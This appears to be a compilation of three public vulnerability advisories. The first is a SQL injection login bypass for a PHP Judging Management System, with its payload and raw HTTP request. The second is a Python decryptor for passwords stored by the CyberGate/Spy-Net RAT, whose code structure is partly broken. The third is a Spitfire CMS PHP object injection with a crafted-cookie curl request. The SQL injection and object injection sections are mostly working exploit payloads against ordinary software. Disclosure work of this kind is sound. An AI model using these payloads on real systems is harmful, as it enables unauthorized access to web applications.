<pre><code># Exploit Title: Judging Management System v1.0 - Authentication Bypass<br /># Date: 12/11/2022<br /># Exploit Author: Angelo Pio Amirante<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 on XAAMP server<br /><br /># Vulnerability: An attacker can bypass login page and access to dashboard page<br /># Vulnerable file: login.php<br /># Exploit:<br /><br />1) Go to: http://localhost/php-jms/index.php<br />2) As username use this payload: 'or 1=1-- -<br />3) Use random words for password<br /><br /><br />POST /php-jms/login.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 37<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/php-jms/index.php<br />Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />username=%27or+1%3D1--+-&password=asa<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/618f28253d1268132a9f10819a6947f2.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Trojan-Dropper.Win32.Decay.dxv (CyberGate v1.00.0)<br />Vulnerability: Insecure Proprietary Password Encryption<br />Family: CyberGate<br />Type: PE32<br />MD5: 618f28253d1268132a9f10819a6947f2<br />Vuln ID: MVID-2022-0664<br />Disclosure: 12/11/2022<br />Description: This well-known RAT malware stores credentials using a proprietary, insecure encryption routine in its "Settings.ini" file. Recovering the stored credentials is trivial: there is no key, XOR or combined encryption mechanism; the routine relies only on basic SUB, ADD and the bitwise SHR and SHL operations. Analysis of the following single-character encryption table reveals that the second output character cycles through the pattern 0,G,W,m every few alphanumeric characters (a-c, d-g, h-k, etc.).<br /><br />E.g.<br /><br />a=OG<br />b=OW<br />c=Om<br />d=P0<br />e=PG<br />f=PW<br />g=Pm<br />h=Q0<br />i=QG<br />j=QW<br />k=Qm<br />l=R0<br />m=RG <br />n=RW <br />o=Rm <br />p=S0 <br />q=SG <br />r=SW <br />s=Sm <br />t=T0 <br />u=TG <br />v=TW <br />w=Tm <br />x=U0 <br />y=UG <br />z=UW <br /><br /><br />"Settings.ini" <br />senhaconexao=OM9Z<br /><br />For example, the password "abc" is stored as "OM9Z". To recover the first character we need only perform the following SUB, ADD, SHR and SHL operations. 
<br /><br />OM9Z = "abc"<br /><br />To recover the first password character, use the first two stored characters "OM", which yield the ASCII value of "a" (0x61).<br /><br />key="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/"<br /><br />get 'a' (Python session; eax and ecx are the 1-based positions of 'O' and 'M' in key):<br /><br />>>> b="PQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/"<br />>>> eax = len(key) - len(b)<br />>>> eax<br />25<br />>>> ebx = eax -1<br />>>> ebx<br />24<br />>>> b="NOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/"<br />>>> ecx = len(key) - len(b)<br />>>> ecx<br />23<br />>>> edx = ecx -1<br />>>> edx<br />22<br />>>> ebx << 6<br />1536<br />>>> hex(1536)<br />'0x600'<br />>>> hex(22)<br />'0x16'<br />>>> 0x600 + 0x16<br />1558<br />>>> hex(1558)<br />'0x616'<br />>>> 0x616 >> 4<br />97<br />>>> hex(97)<br />'0x61'<br /><br />0x61 = 'a'<br /><br /><br />PoC Video:<br />https://www.youtube.com/watch?v=PAkKo2dLGwQ<br /><br />Exploit/PoC:<br />"CyberGate_Trojan_Decryptor.py"<br /><br />import argparse, sys, time, os, atexit<br />from operator import *<br /><br />#CyberGate v1.00.0 - Insecure Proprietary Password Encryption<br />#=========================================================================<br />#Basic password decryptor for the following RAT malwares:<br />#<br />#Trojan-Dropper.Win32.Decay.dxv (CyberGate v1.00.0)<br />#MD5: 618f28253d1268132a9f10819a6947f2<br />#<br />#Spy-Net 2.7 Beta 02 - Backdoor.Win32.Shpinat.a<br />#MD5: eaf37e9506ef76f6d26838692d76aabd<br />#<br />#By John Page (aka hyp3rlinx) Copyright (C) circa 2022<br />#malvuln.com<br />#malvuln13@gmail.com<br />#twitter.com/malvuln<br />#=========================================================================<br />#<br />#PoC to decrypt credentials due to flawed proprietary encryption.<br />#RAT password save usage:<br />#Click 'START' / Options then choose 'Select listening ports' from menu.<br />#Enter a new password in the 'Connection Password' field and click save.<br />#Password gets stored in 'Settings.ini' file.<br />#<br />#Note: Should recover most numeric and or lowercase passwords. 
May return<br />#multiple password candidates depending on the password recovered.<br />#Some limitation with long and or complex passwords, did not put much time on it!<br />#<br />#TODO: Better handle complex long mixed letters and or repeating characters.<br />#Author is NOT responsible for any misuse or incorrect password recovery,<br />#the user accepts ALL risk by using the software.<br />#<br />#MIT License - Copyright (c) 2022 malvuln<br />#Permission is hereby granted, free of charge, to any person obtaining a copy<br />#of this software and associated documentation files (the "Software"), to deal<br />#in the Software without restriction, including without limitation the rights<br />#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell<br />#copies of the Software, and to permit persons to whom the Software is<br />#furnished to do so, subject to the following conditions:<br /><br />#The above copyright notice and this permission notice shall be included in all<br />#copies or substantial portions of the Software.<br />#<br />#DISCLAIMER:<br />#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR<br />#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,<br />#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE<br />#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER<br />#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,<br />#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.<br /><br />#Permission is also explicitly given for insertion in vulnerability databases and similar,<br />#provided that due credit is given to the author:<br />#John Page (aka malvuln/hyp3rlinx) Copyright (C)(TM) 2022<br />#=========================================================================<br />BANNER="""<br /> ____ ______ __ <br /> / __ \___ _________ ___ __ / ____/________ ______/ /_____ _____ <br /> / / / / _ \/ ___/ __ `/ / / / / / / ___/ __ `/ ___/ //_/ _ \/ ___/ <br /> / /_/ / __/ /__/ /_/ / /_/ / / /___/ / / /_/ / /__/ ,< / __/ / <br /> /_____/\___/\___/\__,_/\__, / \____/_/ \__,_/\___/_/|_|\___/_/ <br /> /____/ v1 <br /> By Malvuln (c) circa 2022 <br />"""<br /><br />#Console colors<br />RED="\033[1;31;40m"<br />GREY="\033[1;30;40m"<br />GREEN="\033[1;32;40m"<br />CYAN="\033[1;36;40m"<br />YELLOW="\033[1;33;40m"<br />BOLD = "\033[1m"<br />ENDC = "\033[m" #Default<br /><br />key=["0","1","2","3","4","5","6","7","8","9","A","B","C","D","E","F","G","H","I",<br /> "J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b",<br /> "c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u",<br /> "v","w","x","y","z","+","/"]<br /><br />result=""<br />sz=0<br />key_error=False<br /><br />#Change console back to default if script exited unclean<br />def exit_handler():<br /> print(ENDC)<br /><br />def parse_args():<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument("-c", "--creds", help="Password to decrypt, see --about")<br /> parser.add_argument("-a", "--about", nargs="?", const="1", help="About Decay password decryptor")<br /> parser.add_argument("-e", "--example", nargs="?", const="1", help="Password test samples")<br /> return 
parser.parse_args()

def usage():
    """Print the advisory's sample encrypted passwords next to their plaintexts.

    Informational only (the --example flag); nothing is decoded here.
    """
    print(RED+"[+] "+CYAN+"Encrypted password samples:"+GREY)
    print("[+]----------------------------")
    print("[-] GM9ZCJ8p8G : Abc123!")
    print("[-] KsLZScLqNp4 : Secret_1")
    print("[-] U7bwDZOsNpC : xyz666_3")
    print("[-] PsXlStG : ghost")
    print("[-] CZKmDZSuCp8q : 250678324")
    print("[-] P6bXOcnlC34oCm : diablo0123")
    print("[-] INTbON91JM5dRdLj : IwearAMagnum")
    print("[-] ON1mON9fT6blRdDbOm : apparitionsec")


def info():
    """Print credits and the two RAT samples (identified by MD5) this tool targets (--about)."""
    print(RED+"[$] "+GREY+"Credits: John Page (aka hyp3rlinx)")
    print("[!] Recovers most simple lowercase or numeric passwords for:")
    print("[-] Trojan-Dropper.Win32.Decay.dxv (CyberGate v1.00.0)"+GREY)
    print("[-] "+RED+"MD5: "+GREY+"618f28253d1268132a9f10819a6947f2")
    print("[-] Backdoor.Win32.Shpinat.a (Spy-Net 2.7 Beta 02)"+GREY)
    print("[-] "+RED+"MD5: "+GREY+"eaf37e9506ef76f6d26838692d76aabd")


def main(args):
    """Dispatch on the parsed command-line flags.

    Args:
        args: argparse.Namespace from parse_args(). The three flags are
            independent; any that are set run in the order shown below.
    """
    if args.creds:
        recover(args.creds)
    if args.about:
        info()
    if args.example:
        usage()


# Left-shift amount selected by the SECOND character of each 4-character
# chunk in doit() (see its `if i==2` branch). A character missing from this
# table triggers the KeyError fallback there and sets the global `key_error`.
# NOTE(review): the table looks hand-derived from observed samples — confirm
# against the RAT's routine before relying on it for unusual characters.
# NOTE: "7" is listed twice; both entries map to 7, so the duplicate is harmless.
shf_map = {"0" : 6, "m" : 3, "p" : 3, "3" : 3, "M" : 6, "6" : 6, "C" : 3, "2" : 2,
           "D" : 3, "7" : 7, "s" : 6, "R" : 6, "J": 3, "Z": 3, "G" : 6, "o": 2,
           "W" : 6, "K" : 12, "c" : 6, "a" : 6, "4" : 6, "t" : 7, "q" : 12,
           "N" : 7, "7" : 7, "L" : 5, "r" : 6, "d" : 7, "I" : 2, "5" : 6, "Y" : 2}


def chunk(char):
    """Return the 1-based position of `char` in the 64-entry `key` alphabet.

    Equivalent to `key.index(char) + 1`; it is written as
    `len(key) - len(key[c + 1:])` to mirror the advisory's walkthrough
    (`eax = len(key) - len(b)`).

    Returns None when `char` is not in `key`; doit() then fails with a
    TypeError on `EAX -1`, so only alphabet characters should be passed.
    """
    c=-1
    key_len=len(key) #64
    for i in key:
        c+=1
        if i==char:
            cnt = c  # unused
            #Grab part up to including the first char arg.
            tmp = key[c + 1:]
            return key_len - len(tmp)

def doit(paswd):
    """Decode one chunk of up to four encrypted characters into up to three
    plaintext characters.

    Each input character is mapped to its alphabet position via chunk() and
    combined with the running accumulator ECX using shift/add arithmetic that
    follows the advisory's register walkthrough (the EAX/EBX/ECX names are
    kept). With pos = chunk(x):

      i == 1: ECX = (pos - 1) << 6
      i == 2: TMP = ECX + (pos - 1); first char = chr(TMP >> 4);
              then ECX = shf_map[x] << 6 (shift chosen by this character)
      i == 3: TMP = ECX + (pos - 1); second char = chr(TMP >> 2);
              then ECX = 0 if that shift was < 6, else 1 << 6
      i == 4: TMP = ECX + (pos - 1); third char = chr(TMP) (no shift)

    Worked example from the advisory: "OM9Z" -> "abc".

    A second character missing from shf_map prints a warning, sets the module
    global `key_error`, and leaves the shift at 0, so the remaining characters
    are decoded with a zero accumulator.

    Args:
        paswd: 1-4 characters from the key alphabet (each is .strip()ped).
    Returns:
        The recovered characters; "" for a single-character input.
    """
    global key_error
    CREDZ=""
    lst = paswd.split(",")  # unused
    i=0
    EBX=0
    ECX=0
    TMP=0
    LSH=0
 
    for x in paswd:
        i+=1
        x = x.strip()
        EAX = chunk(x)
        EBX = EAX -1
        EBX_CPY = EAX -1  # same value as EBX; EBX is shifted below, this copy is not

        if i > 1:
            #ADD
            # int(hex(...), 16) is an identity round-trip on an int; kept as written.
            TMP = int(hex(add(int(ECX), EBX_CPY)), 16)

            #SHR
            if i== 2:
                TMP = TMP >> 4
                CREDZ = chr(TMP)
 
            if i == 3:
                TMP = TMP >> 2
                CREDZ += chr(TMP)
            if i == 4:
                CREDZ += chr(TMP)

        #SHL
        if i==1:
            EBX = EBX << 6
            ECX = int(hex(EBX), 16)

        if i==2:
            #Assign once
            if LSH ==0:
                try:
                    LSH = int(shf_map[x])
                except KeyError as e:
                    #Fail safe just in case
                    print("[!] Key Error: Try adding a value for "+str(e)+" to the 'shf_map' dictionary.")
                    key_error=True
                    pass
            EBX = LSH << 6 
            ECX = int(hex(EBX), 16)

        if i==3: #At end no SHL
            EBX = 1 << 6
            if LSH < 6:
                ECX = EBX - EBX  # i.e. 0
            else:
                ECX = int(hex(EBX), 16)
 
        time.sleep(0.1)  # cosmetic pacing only; not needed for correctness

    return CREDZ

def recover(paswd):
    """Recover a whole stored password by feeding doit() 4-character chunks.

    Appends to the module global `result` (the recovered text) and sets the
    module global `sz` (length of the encrypted input). Progress is printed
    to stdout.

    The `for i in paswd` loop iterates the ORIGINAL string: rebinding `paswd`
    to the remaining suffix inside the loop only affects the `len(paswd)`
    bookkeeping used for the leftover handling, not the iteration itself.

    Args:
        paswd: the encrypted string as found in Settings.ini.
    """
    global result, sz
    tmp=""
    c=0
    sz=len(paswd)
    print("[+] "+CYAN+"Recovering: "+GREY+paswd)
    print("[-] Initial len: "+str(len(paswd)))
    for i in paswd:
        c+=1
        tmp += i
        #Handle single char passwds
        if sz == 2:
            result = doit(paswd)
            return
        #Process in chunks of four bytes
        if c == 4:
            paswd = paswd[c:]
            print("[+] cracking: " +tmp + " " +str(len(paswd)))
            result += doit(tmp)
            tmp=""
            c=0
        #Process leftover bytes
        if len(paswd) == 3:
            if c==3:
                print("[+] cracking: " +tmp + " " +str(len(paswd)))
                tmp += paswd[c:]  # paswd[3:] of a 3-char string is "", so this is a no-op
                result += doit(tmp)
                c=0
        elif len(paswd) == 2:
            tmp += paswd[c:c]  # always "" (empty slice); tmp already holds the chars read so far
            result += doit(tmp)
            c=0


if __name__=="__main__":
    # Entry point; this block continues past this excerpt (atexit handler,
    # main(), and post-processing of `result`).
    parser = argparse.ArgumentParser()
    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    os.system("color")  # presumably enables ANSI colour output on Windows consoles — TODO confirm
    print(RED+BANNER+GREY)
    print(RED+"[$] "+GREY+"CyberGate (Spy-Net) Trojan RAT") 
    print(RED+"[$] "+GREY+"Basic Password Decryptor")
atexit.register(exit_handler)<br /> main(parse_args())<br /> candidate2=""<br /> if result:<br /> if sz >= 8:<br /> if result[len(result)-1:] == "p":<br /> candidate2 = result[:len(result) -1] + "0"<br /> if result[len(result)-1:] == "q":<br /> candidate2 = result[:len(result) -1] + "1"<br /> if result[len(result)-1:] == "r":<br /> candidate2 = result[:len(result) -1] + "2"<br /> if result[len(result)-1:] == "s":<br /> candidate2 = result[:len(result) -1] + "3"<br /> if result[len(result)-1:] == "t":<br /> candidate2 = result[:len(result) -1] + "4"<br /> if result[len(result)-1:] == "u":<br /> candidate2 = result[:len(result) -1] + "5"<br /> if result[len(result)-1:] == "v":<br /> candidate2 = result[:len(result) -1] + "6"<br /> if result[len(result)-1:] == "w":<br /> candidate2 = result[:len(result) -1] + "7"<br /> if result[len(result)-1:] == "x":<br /> candidate2 = result[:len(result) -1] + "8"<br /> if result[len(result)-1:] == "y":<br /> candidate2 = result[:len(result) -1] + "9"<br /> if key_error:<br /> print("[*] Likely partially recovered credz: ==> "+result)<br /> else:<br /> if not candidate2:<br /> print("[*] Probable credz: ==> "+RED+result+GREY)<br /> else:<br /> print("[*] Probable credz: ==> "+RED+result+GREY+" OR "+RED+candidate2+GREY)<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. 
The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code><br />Spitfire CMS 1.0.475 (cms_backup_values) PHP Object Injection<br /><br /><br />Vendor: Claus Muus<br />Product web page: http://spitfire.clausmuus.de<br />Affected version: 1.0.475<br /><br />Summary: Spitfire is a system to manage the content of webpages.<br /><br />Desc: The application is prone to a PHP Object Injection vulnerability<br />due to the unsafe use of the unserialize() function on the attacker-controlled<br />cms_backup_values cookie (tpl_backup.inc.php line 52). An authenticated<br />attacker could exploit this vulnerability by sending specially crafted<br />requests to the web application containing malicious serialized input.<br />Deserializing cookie data with unserialize() should be avoided (e.g. store<br />JSON instead, or at minimum pass ['allowed_classes' => false]).<br /><br />-----------------------------------------------------------------------<br />cms/edit/tpl_backup.inc.php:<br />----------------------------<br />47: private function status ()<br />48: {<br />49: $status = array ();<br />50:<br />51: $status['values'] = array ();<br />52: $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array ();<br />...<br />...<br />77: public function save ($values)<br />78: {<br />79: $values = array_merge ($this->status['values'], $values);<br />80: setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30);<br />81: }<br />-----------------------------------------------------------------------<br /><br />Tested on: nginx<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5720<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5720.php<br /><br /><br />28.09.2022<br /><br />--<br /><br /><br />> curl -isk -XPOST http://10.0.0.2/cms/edit/tpl_backup_action.php \<br /> -H 'Content-Type: application/x-www-form-urlencoded'<br /> -H 'Accept: */*'<br /> -H 'Referer: http://10.0.0.2/cms/edit/cont_index.php?tpl=backup'<br /> -H 'Accept-Encoding: gzip, deflate'<br /> -H 'Accept-Language: en-US,en;q=0.9'<br /> -H 'Connection: close' \<br /> -H 'Cookie: tip=0; 
cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \<br /> --data 'action=save&&value=1'<br /> #--data 'action=save&&value[files]={}'<br /></code></pre>